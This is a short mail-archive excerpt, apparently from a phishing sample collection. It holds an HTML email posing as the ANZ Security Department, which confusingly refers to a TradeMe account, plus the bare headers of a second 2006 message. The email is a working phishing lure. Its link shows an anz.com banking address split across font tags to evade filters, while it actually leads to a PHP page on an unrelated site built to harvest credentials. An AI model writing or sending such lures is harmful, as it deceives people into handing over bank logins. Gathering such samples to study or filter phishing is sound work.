From: <service@anz.com>
Reply-To: service@anz.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Status: 
X-Status: 
X-Keywords:                   

Dear nobody@example.com,<br><br> 
We recently noticed one or more attempts to log in to your TradeMe account 
from a different IP addresses.<br><br> 
If you recently accessed your account while traveling, the unusual log in 
attempts may have been initiated by you. However, if you did not initiate 
the log ins, please visit TradeMe as soon as possible to check-up your 
account information:<br><br> 
<a
href="http://www.sunrise.cc/bbs/anz.php"><font>ht</font><font>tp</font><font>://w</font><font>ww.</font><font>anz</font><font>.co</font><font>m/i</font><font>net</font><font>bank</font><font>/bankmain</font><font>.asp</font></a><br><br> 
Thanks for your patience.<br><br> 
Sincerely, 
ANZ Security Department<br><br> 
----------------------------------------------------------------<br><br> 
Please do not reply to this e-mail. Mail sent to this address cannot be 
answered.<br><br> 
Email ID 376223



From William@nethomebiz.net  Mon May 15 19:49:42 2006
Return-Path: <William@nethomebiz.net>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id 1B007CAB4AE
	for <nobody@login.example.com>; Mon, 15 May 2006 19:49:42 -0400 (EDT)
Received: from komp.chello.pl (chello084010063044.chello.pl [84.10.63.44])
	by mail1.example.com (Postfix) with SMTP id 1769E6CCF72
	for <nobody@example.com>; Mon, 15 May 2006 19:49:40 -0400 (EDT)
Message-ID: <829B4FD1.8779522@reports.bluesecurity.com>
Date: Tue, 16 May 2006 01:49:10 +0200
